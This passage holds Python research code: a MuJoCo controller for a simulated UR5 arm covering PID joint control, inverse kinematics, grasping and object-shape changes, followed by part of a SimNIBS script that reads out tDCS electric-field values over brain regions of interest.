This list is only initiated here, its \n values are overwritten at the first simulation step.\n - actuators: 2D list, each entry represents one actuator and contains:\n 0 actuator ID \n 1 actuator name \n 2 joint ID of the joint controlled by this actuator \n 3 joint name\n 4 controller for controlling the actuator\n \"\"\"\n\n self.controller_list = []\n\n # Values for training\n sample_time = 0.0001\n # p_scale = 1\n p_scale = 3\n i_scale = 0.0\n i_gripper = 0\n d_scale = 0.1\n self.controller_list.append(PID(7*p_scale, 0.0*i_scale, 1.1*d_scale, setpoint=0, output_limits=(-2, 2), sample_time=sample_time)) # Shoulder Pan Joint\n self.controller_list.append(PID(10*p_scale, 0.0*i_scale, 1.0*d_scale, setpoint=-1.57, output_limits=(-2, 2), sample_time=sample_time)) # Shoulder Lift Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.5*d_scale, setpoint=1.57, output_limits=(-2, 2), sample_time=sample_time)) # Elbow Joint\n self.controller_list.append(PID(7*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=-1.57, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 1 Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=-1.57, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 2 Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 3 Joint\n self.controller_list.append(PID(2.5*p_scale, i_gripper, 0.00*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Gripper Joint\n # self.controller_list.append(PID(10.5*p_scale, 0.2, 0.1*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Gripper Joint\n # self.controller_list.append(PID(2*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=0.2, output_limits=(-0.5, 0.8), sample_time=sample_time)) # Finger 2 Joint 1\n # self.controller_list.append(PID(1*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=0.0, output_limits=(-0.5, 0.8), sample_time=sample_time)) # Middle Finger Joint 1\n # self.controller_list.append(PID(1*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=-0.1, output_limits=(-0.8, 0.8), sample_time=sample_time)) # Gripperpalm Finger 1 Joint\n\n self.current_target_joint_values = []\n for i in range(len(self.sim.data.ctrl)):\n self.current_target_joint_values.append(self.controller_list[i].setpoint)\n self.current_target_joint_values = np.array(self.current_target_joint_values)\n\n self.current_output = []\n for i in range(len(self.controller_list)):\n self.current_output.append(self.controller_list[i](0))\n\n\n self.actuators = []\n for i in range(len(self.sim.data.ctrl)):\n item = []\n item.append(i)\n item.append(self.model.actuator_id2name(i))\n item.append(self.model.actuator_trnid[i][0])\n item.append(self.model.joint_id2name(self.model.actuator_trnid[i][0]))\n item.append(self.controller_list[i])\n self.actuators.append(item)\n\n\n def actuate_joint_group(self, group, motor_values):\n try:\n assert group in self.groups.keys(), 'No group with name {} exists!'.format(group)\n assert len(motor_values) == len(self.groups[group]), 'Invalid number of actuator values!'\n for i,v in enumerate(self.groups[group]):\n self.sim.data.ctrl[v] = motor_values[i]\n\n except Exception as e:\n print(e)\n print('Could not actuate requested joint group.')\n\n\n def move_group_to_joint_target(self, group='All', target=None, tolerance=0.05, max_steps=10000, plot=False, marker=False, render=True, quiet=False):\n \"\"\"\n Moves the specified joint group to a joint target.\n Args:\n group: String 
specifying the group to move.\n target: List of target joint values for the group.\n tolerance: Threshold within which the error of each joint must be before the method finishes.\n max_steps: maximum number of steps to actuate before breaking\n plot: If True, a .png image of the group joint trajectories will be saved to the local directory.\n This can be used for PID tuning in case of overshoot etc. The name of the file will be \"Joint_angles_\" + a number.\n marker: If True, a colored visual marker will be added into the scene to visualize the current\n cartesian target.\n \"\"\"\n \n try:\n assert group in self.groups.keys(), 'No group with name {} exists!'.format(group)\n if target is not None:\n assert len(target) == len(self.groups[group]), 'Mismatching target dimensions for group {}!'.format(group)\n ids = self.groups[group]\n steps = 1\n result = ''\n if plot:\n self.plot_list = defaultdict(list)\n self.reached_target = False\n deltas = np.zeros(len(self.sim.data.ctrl))\n\n if target is not None:\n for i,v in enumerate(ids):\n self.current_target_joint_values[v] = target[i]\n # print('Target joint value: {}: {}'.format(v, self.current_target_joint_values[v]))\n\n for j in range(len(self.sim.data.ctrl)):\n # Update the setpoints of the relevant controllers for the group\n self.actuators[j][4].setpoint = self.current_target_joint_values[j]\n # print('Setpoint {}: {}'.format(j, self.actuators[j][4].setpoint))\n\n while not self.reached_target:\n current_joint_values = self.sim.data.qpos[self.actuated_joint_ids]\n\n # self.get_image_data(width=200, height=200, show=True)\n \n # We still want to actuate all motors towards their targets, otherwise the joints of non-controlled\n # groups will start to drift \n for j in range(len(self.sim.data.ctrl)):\n self.current_output[j] = self.actuators[j][4](current_joint_values[j])\n self.sim.data.ctrl[j] = self.current_output[j]\n for i in ids:\n deltas[i] = abs(self.current_target_joint_values[i] - current_joint_values[i])\n\n if steps%1000==0 and target is not None and not quiet:\n print('Moving group {} to joint target! Max. delta: {}, Joint: {}'.format(group, max(deltas), self.actuators[np.argmax(deltas)][3]))\n\n if plot and steps%2==0:\n self.fill_plot_list(group, steps)\n\n temp = self.sim.data.body_xpos[self.model.body_name2id('ee_link')] - [0, -0.005, 0.16]\n\n if marker:\n self.add_marker(self.current_carthesian_target)\n self.add_marker(temp)\n\n if max(deltas) < tolerance:\n #if target is not None and not quiet:\n # print(colored('Joint values for group {} within requested tolerance! ({} steps)'.format(group, steps), color='green', attrs=['bold']))\n result = 'success'\n self.reached_target = True\n # break\n\n if steps > max_steps:\n if not quiet:\n print(colored('Max number of steps reached: {}'.format(max_steps), color='red', attrs=['bold']))\n print('Deltas: ', deltas)\n result = 'max. 
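# --- Aside: the convergence test in the loop above boils down to "largest
# per-joint error under tolerance". A vectorised equivalent, with hypothetical
# target/current arrays rather than the simulator state:
import numpy as np

target = np.array([0.0, -1.57, 1.57])
current = np.array([0.05, -1.50, 1.60])
deltas = np.abs(target - current)
worst = int(np.argmax(deltas))          # the joint index the progress print reports
reached = bool(np.max(deltas) < 0.05)   # mirrors `max(deltas) < tolerance`
print(worst, reached)                   # -> 1 False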
steps reached: {}'.format(max_steps)\n break\n\n self.sim.step()\n if render:\n self.viewer.render()\n steps += 1\n\n self.last_movement_steps = steps\n\n if plot:\n self.create_joint_angle_plot(group=group, tolerance=tolerance)\n\n return result\n\n\n except Exception as e:\n print(e)\n print('Could not move to requested joint target.')\n\n\n def set_group_joint_target(self, group, target):\n\n idx = self.groups[group]\n try:\n assert len(target) == len(idx), 'Length of the target must match the number of actuated joints in the group.'\n self.current_target_joint_values[idx] = target\n\n except Exception as e:\n print(e)\n print('Could not set new group joint target for group '.format(group))\n\n \n\n def open_gripper(self, half=False, **kwargs):\n \"\"\"\n Opens the gripper while keeping the arm in a steady position.\n \"\"\"\n if half: \n result = self.move_group_to_joint_target(group='Gripper', target=[0.0], max_steps=1000, tolerance=0.05, **kwargs)\n else:\n result = self.move_group_to_joint_target(group='Gripper', target=[0.4], max_steps=1000, tolerance=0.05, **kwargs)\n # print('Open: ', self.sim.data.qpos[self.actuated_joint_ids][self.groups['Gripper']])\n return result\n\n\n def close_gripper(self, **kwargs):\n # def close_gripper(self, render=True, max_steps=1000, plot=False, quiet=True):\n \"\"\"\n Closes the gripper while keeping the arm in a steady position.\n \"\"\"\n\n result = self.move_group_to_joint_target(group='Gripper', target=[-0.4], tolerance=0.01, **kwargs)\n # result = self.move_group_to_joint_target(group='Gripper', target=[-0.4], tolerance=0.05, **kwargs)\n # print('Closed: ', self.sim.data.qpos[self.actuated_joint_ids][self.groups['Gripper']])\n # result = self.move_group_to_joint_target(group='Gripper', target=[0.45, 0.45, 0.55, -0.17], tolerance=0.05, max_steps=max_steps, render=render, marker=True, quiet=quiet, plot=plot)\n return result\n\n\n def grasp(self, **kwargs):\n # def grasp(self, render=True, plot=False):\n \"\"\"\n Attempts a grasp at the current location and prints some feedback on weather it was successful \n \"\"\"\n\n result = self.close_gripper(max_steps=300, **kwargs)\n\n if result == 'success':\n return False\n else:\n return True\n\n\n def move_ee(self, ee_position, **kwargs):\n \"\"\"\n Moves the robot arm so that the gripper center ends up at the requested XYZ-position,\n with a vertical gripper position.\n Args:\n ee_position: List of XYZ-coordinates of the end-effector (ee_link for UR5 setup).\n plot: If True, a .png image of the arm joint trajectories will be saved to the local directory.\n This can be used for PID tuning in case of overshoot etc. The name of the file will be \"Joint_angles_\" + a number.\n marker: If True, a colored visual marker will be added into the scene to visualize the current\n cartesian target.\n \"\"\"\n joint_angles = self.ik(ee_position)\n if joint_angles is not None:\n result = self.move_group_to_joint_target(group='Arm', target=joint_angles, **kwargs)\n # result = self.move_group_to_joint_target(group='Arm', target=joint_angles, tolerance=0.05, plot=plot, marker=marker, max_steps=max_steps, quiet=quiet, render=render)\n else:\n result = 'No valid joint angles received, could not move EE to position.'\n self.last_movement_steps = 0\n return result\n\n\n def ik(self, ee_position):\n \"\"\"\n Method for solving simple inverse kinematic problems.\n This was developed for top down graspig, therefore the solution will be one where the gripper is \n vertical. 
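# --- Aside: the ik() method below validates its solution by a forward-kinematics
# round trip (solve, re-project, compare against a 0.02 m error budget). A
# self-contained illustration of that pattern on a toy 2-link planar arm --
# link lengths and target are made up here, this is not the UR5 chain:
import numpy as np

def fk(t1, t2, l1=1.0, l2=1.0):
    return np.array([l1 * np.cos(t1) + l2 * np.cos(t1 + t2),
                     l1 * np.sin(t1) + l2 * np.sin(t1 + t2)])

def ik(target, l1=1.0, l2=1.0):
    x, y = target
    c2 = (x * x + y * y - l1 * l1 - l2 * l2) / (2 * l1 * l2)
    if abs(c2) > 1:
        return None                       # target outside the workspace
    t2 = np.arccos(c2)
    t1 = np.arctan2(y, x) - np.arctan2(l2 * np.sin(t2), l1 + l2 * np.cos(t2))
    return t1, t2

target = np.array([1.2, 0.7])
sol = ik(target)
assert sol is not None and np.linalg.norm(fk(*sol) - target) < 0.02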
This might need adjustment for other gripper models.\n Args:\n ee_position: List of XYZ-coordinates of the end-effector (ee_link for UR5 setup).\n Returns:\n joint_angles: List of joint angles that will achieve the desired ee position. \n \"\"\"\n\n try:\n assert len(ee_position) == 3, 'Invalid EE target! Please specify XYZ-coordinates in a list of length 3.'\n self.current_carthesian_target = ee_position.copy()\n # We want to be able to spedify the ee position in world coordinates, so subtract the position of the\n # base link. This is because the inverse kinematics solver chain starts at the base link. \n ee_position_base = ee_position - self.sim.data.body_xpos[self.model.body_name2id('base_link')]\n\n # By adding the appr. distance between ee_link and grasp center, we can now specify a world target position\n # for the grasp center instead of the ee_link\n gripper_center_position = ee_position_base + [0, -0.005, 0.16]\n # gripper_center_position = ee_position_base + [0, 0, 0.185]\n\n # initial_position=[0, *self.sim.data.qpos[self.actuated_joint_ids][self.groups['Arm']], 0]\n # joint_angles = self.ee_chain.inverse_kinematics(gripper_center_position, [0,0,-1], orientation_mode='X', initial_position=initial_position, regularization_parameter=0.05)\n joint_angles = self.ee_chain.inverse_kinematics(gripper_center_position, [0,0,-1], orientation_mode='X')\n\n prediction = self.ee_chain.forward_kinematics(joint_angles)[:3, 3] + self.sim.data.body_xpos[self.model.body_name2id('base_link')] - [0, -0.005, 0.16]\n diff = abs(prediction - ee_position)\n error = np.sqrt(diff.dot(diff))\n joint_angles = joint_angles[1:-2]\n # joint_angles = joint_angles[1:-1]\n\n # print(error)\n if error > 0.02:\n #print('Failed to find IK solution.')\n return None\n else:\n return joint_angles\n\n except Exception as e:\n print(e)\n print('Could not find an inverse kinematics solution.')\n\n def ik_2(self, pose_target):\n \"\"\"\n TODO: Implement orientation.\n \"\"\"\n target_position = pose_target[:3]\n target_position -= self.sim.data.body_xpos[self.model.body_name2id('base_link')]\n orientation = Quaternion(pose_target[3:])\n target_orientation = orientation.rotation_matrix\n target_matrix = orientation.transformation_matrix\n target_matrix[0][-1] = target_position[0]\n target_matrix[1][-1] = target_position[1]\n target_matrix[2][-1] = target_position[2]\n print(target_matrix)\n self.current_carthesian_target = pose_target[:3]\n joint_angles = self.ee_chain.inverse_kinematics_frame(target_matrix, initial_position=initial_position, orientation_mode='all')\n joint_angles = joint_angles[1:-1]\n current_finger_values = self.sim.data.qpos[self.actuated_joint_ids][6:]\n target = [*joint_angles, *current_finger_values]\n\n\n def display_current_values(self):\n \"\"\"\n Debug method, simply displays some relevant data at the time of the call.\n \"\"\"\n\n print('\\n################################################')\n print('CURRENT JOINT POSITIONS (ACTUATED)')\n print('################################################')\n for i in range(len(self.actuated_joint_ids)):\n print('Current angle for joint {}: {}'.format(self.actuators[i][3], self.sim.data.qpos[self.actuated_joint_ids][i]))\n\n print('\\n################################################')\n print('CURRENT JOINT POSITIONS (ALL)')\n print('################################################')\n for i in range(len(self.model.jnt_qposadr)):\n # for i in range(self.model.njnt):\n name = self.model.joint_id2name(i)\n print('Current angle for joint {}: {}'.format(name, 
self.sim.data.get_joint_qpos(name)))\n # print('Current angle for joint {}: {}'.format(self.model.joint_id2name(i), self.sim.data.qpos[i]))\n\n print('\\n################################################')\n print('CURRENT BODY POSITIONS')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current position for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xpos[i]))\n\n print('\\n################################################')\n print('CURRENT BODY ROTATION MATRIZES')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current rotation for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xmat[i]))\n\n print('\\n################################################')\n print('CURRENT BODY ROTATION QUATERNIONS (w,x,y,z)')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current rotation for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xquat[i]))\n\n print('\\n################################################')\n print('CURRENT ACTUATOR CONTROLS')\n print('################################################') \n for i in range(len(self.sim.data.ctrl)):\n print('Current activation of actuator {}: {}'.format(self.actuators[i][1], self.sim.data.ctrl[i]))\n\n\n\n\n def stay(self, duration, render=True):\n \"\"\"\n Holds the current position by actuating the joints towards their current target position.\n Args:\n duration: Time in ms to hold the position.\n \"\"\"\n\n # print('Holding position!')\n starting_time = time.time()\n elapsed = 0\n while elapsed < duration:\n self.move_group_to_joint_target(max_steps=10, tolerance=0.0000001, plot=False, quiet=True, render=render)\n elapsed = (time.time() - starting_time)*1000\n # print('Moving on...')\n\n\n\n\n def add_marker(self, coordinates, label=True, size=[0.015, 0.015, 0.015], color=[1,0,0]):\n \"\"\"\n Adds a circular red marker at the coordinates, dislaying the coordinates as a label.\n Args:\n coordinates: List of XYZ-coordinates in m.\n label: If True, displays the target coordinates next to the marker\n size: List of floats specifying the radius in each direction\n color: List of floats between 0 and 1 specifying the RGB color parts\n \"\"\"\n \n if label:\n label_str = str(coordinates)\n else:\n label_str = ''\n\n rgba = np.concatenate((color, np.ones(1)))\n self.viewer.add_marker(pos=coordinates, label=label_str, size=size, rgba=rgba, type=2)\n\n @property\n def last_steps(self):\n return self.last_movement_steps\n\n\n def get_ft(self):\n ft_data=[0,0,0,0,0,0]\n for i in range(70):\n ft_data += self.sim.data.sensordata\n force_torque = [i / 70 for i in ft_data]\n ft = [round(i, 4) for i in force_torque]\n ft[1]=ft[1]+7\n return ft\n \n def change_object_palace(self, x,y,z, name):\n self.model.body_pos[self.model.body_name2id(name)]=[x, y, z]\n def change_object_shape(self, shape):\n\n if shape == 0:#tube plug\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0165, 0.04, 0.0113]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.01, 0.12 ]\n\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.04, 0.01, 0.0165 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n\n self.model.geom_quat[self.model.geom_name2id('plug_3')]=[1., 0., 0., 0. 
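# --- Aside: display_current_values() above prints body quaternions in MuJoCo's
# (w, x, y, z) convention. Converting one into the rotation matrix it also
# prints is a short, standard formula (plain numpy, assumes a unit quaternion):
import numpy as np

def quat_to_mat(q):
    w, x, y, z = q
    return np.array([
        [1 - 2 * (y * y + z * z), 2 * (x * y - w * z),     2 * (x * z + w * y)],
        [2 * (x * y + w * z),     1 - 2 * (x * x + z * z), 2 * (y * z - w * x)],
        [2 * (x * z - w * y),     2 * (y * z + w * x),     1 - 2 * (x * x + y * y)],
    ])

assert np.allclose(quat_to_mat([1, 0, 0, 0]), np.eye(3))   # identity rotation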
]\n self.model.geom_type[self.model.geom_name2id('plug_3')]=6\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0053, 0.04, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[-0.0259, 0.07, 0.12 ]\n \n self.model.geom_quat[self.model.geom_name2id('plug_4')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_4')]=6\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0053, 0.04, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0.0279, 0.07, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n \n elif shape == 1:#tube\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0065, 0.06, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n\n\n elif shape == 2:#cylinder\n self.model.body_quat[self.model.body_name2id('platt2')]=[0, 0, 0, -1 ]\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0225, 0.06, 0.0075 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[0, 0, 1, -1 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.00645, 0.06, 0.0247]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n\n \n \n \n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n #self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.0, 0.0 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n\n\n elif shape == 3:#cylinder plug\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. 
]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0165, 0.04, 0.0113]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.01, 0.12 ]\n\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.04, 0.01, 0.0165 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n\n self.model.geom_quat[self.model.geom_name2id('plug_3')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_3')]=6\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.003, 0.04, 0.01 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[-0.027, 0.07, 0.12 ]\n \n self.model.geom_quat[self.model.geom_name2id('plug_4')]=[1., 0., 0., 0. ]\n\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.003, 0.04, 0.01 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0.027, 0.07, 0.12 ]\n\n\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.01, 0.04, 0.003 ]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[-0.027, 0.07, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')]=[0.01, 0.04, 0.003]\n self.model.geom_pos[self.model.geom_name2id('plug_6')]=[0.027, 0.07, 0.12 ]\n elif shape == 4:#cylinder plug\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.003, 0.06, 0.003 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n elif shape == 5:#cylinder plug\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.018, 0.06, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. 
]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]","repo_name":"Raoufsawas/UR5_MuJoCo","sub_path":"gym_ur5/controller/MujocoController.py","file_name":"MujocoController.py","file_ext":"py","file_size_in_byte":32927,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"70962877949","text":"#Issue: Create tsv document for all needed E-field analysis \n#Author: Filip Niemann & Steffen Riemann\n#Date: 21.09.2023\n\nimport os\nimport pathmanager\nimport pandas as pd\nfrom simnibs import sim_struct, run_simnibs, mni2subject_coords\nimport sys\nimport traceback\n\nsys.path.append(r'./SimNIBS_enhanced')\nimport Readout_E_fields_roi_and_mask as SE\n\nfrom importlib import reload\nreload(SE)\n\nfrom numpy import asarray\nimport numpy as np\nimport simnibs\nimport csv\nimport fnmatch\nfrom scipy.stats import pearsonr\n\n\n\n#Simnibs seperates it\"s mesh values in nodes of the tetraedic structure which gets optimise to get mesh and element structure, which is at the baricenter of 3 nodes.\n#The normal TDCS_1_scalar.msh has the possibility to get rois for the elements at grey matter by gropping all mesh structures labels as 2\n#These element files only contain normE fields but no normal component of the field, therefor a surface with orientation is needed\n#The fsaverage space however is such a surface made of nodes and only grey matter, only head_mesh.crop_mesh(1002) is working, but also not needed\n#The fsaverage space contains all fields in the superficial grey matter (insula etc, but noch amygdala etc.)\n\n#Get subject coordinates\n#subject coordinates are use to caculate simulations. 
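# --- Aside: change_object_shape() in the UR5 controller record above disables
# unused plug geoms by writing zero sizes/positions one geom at a time. A
# hypothetical helper (not in the original code) that factors out that
# repetition, using the same model attributes:
def hide_geoms(model, names):
    """Zero out size and position of the named geoms so they vanish."""
    for name in names:
        gid = model.geom_name2id(name)
        model.geom_size[gid] = [0.0, 0.0, 0.0]
        model.geom_pos[gid] = [0.0, 0.0, 0.0]

# e.g. inside the shape == 1 branch:
#     hide_geoms(self.model, ['plug_2', 'plug_3', 'plug_4', 'plug_5', 'plug_6'])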
In the overlay folder the fields are saved in MNI space\n#so USE MNI COORDINATES for readouts of fsaverage mesh files _TDCS_1_scalar_fsaverage.msh\n\n#readout_in=['sub_space','fsaverage_mni_space'] #chooses the overlay meshfile in the subject or fsaverage overlay folder, \n# E fields will be read out in this space\n\n#mask error in subject space because different sizes of rois\n\nif pathmanager.Exp=='VerFlu_HI' or pathmanager.Exp == 'VerFlu_TI' or pathmanager.Exp == 'VerFlu_Phon':\n    for Session in ['Kopf','Zahl']:\n        sheet= pathmanager.Exp +'_' + Session\n        for region in ['IFG','M1']:\n            for roi_type in ['mask','sphere']: # Use IFG or M1 mask and spheres read out \n                for field_name in ['E_normal','E_norm']: # choose normal component E-field and magnitude E-field (norm E)\n                    for subject_space in ['mni2sub','sub']: # planned coordinates in mni space, actual in sub space\n                        if roi_type== 'mask': #mask error in subject space because different sizes of rois\n                            r=[]\n                            readout_in = 'fsaverage_mni_space' \n                            SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                        else: \n\n                            readout_in = 'fsaverage_mni_space' \n                            for radius in [12.5,25,37.5]: #radius in mm for 3 different radii\n                                r=radius\n                                try:\n                                    SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                                except Exception:\n                                    traceback.print_exc() \n\nelif pathmanager.Exp=='VerFlu_HM' or pathmanager.Exp == 'VerFlu_TM':\n    for Session in ['Kopf','Zahl']:\n        sheet= pathmanager.Exp +'_' + Session\n        for region in ['M1','IFG']:\n            for roi_type in ['mask','sphere']:\n                for field_name in ['E_normal','E_norm']:\n                    for subject_space in ['mni2sub','sub']:\n                        if roi_type== 'mask': #mask error in subject space because different sizes of rois\n                            r=[]\n                            readout_in = 'fsaverage_mni_space' # E fields will be read out in this space\n                            SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                        else: \n                            #for readout_in in ['sub-space','fsaverage_mni_space']:\n                            readout_in = 'fsaverage_mni_space' # E fields will be read out in this space \n                            for radius in [12.5,25,37.5]: #radii in mm \n                                r=radius\n                                try:\n                                    SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                                except Exception:\n                                    traceback.print_exc()\n\n\n#to show how the M1 montage affects the IFG area, uncomment and analyse this part\n\"\"\"\nif pathmanager.Exp=='VerFlu_HM' or pathmanager.Exp == 'VerFlu_TM':\n    region='IFG'\n    for Session in ['Kopf','Zahl']:\n        sheet= pathmanager.Exp +'_' + Session\n        for roi_type in ['mask','sphere']:\n            for field_name in ['E_normal','E_norm']:\n                for subject_space in ['mni2sub','sub']:\n                    if roi_type== 'mask': #mask error in subject space because different sizes of rois\n                        readout_in = 'fsaverage_mni_space'\n                        r=[]\n                        RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                    else: \n                        #for readout_in in ['sub-space','fsaverage_mni_space']:\n                        readout_in in 'fsaverage_mni_space' \n                        for radius in [12.5,25,32.5]: #radius in mm\n                            r=radius\n                            try:\n                                RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n                            except Exception:\n                                traceback.print_exc()\n\nif pathmanager.Exp=='VerFlu_HI' or pathmanager.Exp == 'VerFlu_TI':\n    region='M1'\n    for Session in ['Kopf','Zahl']:\n        sheet= pathmanager.Exp +'_' + Session\n        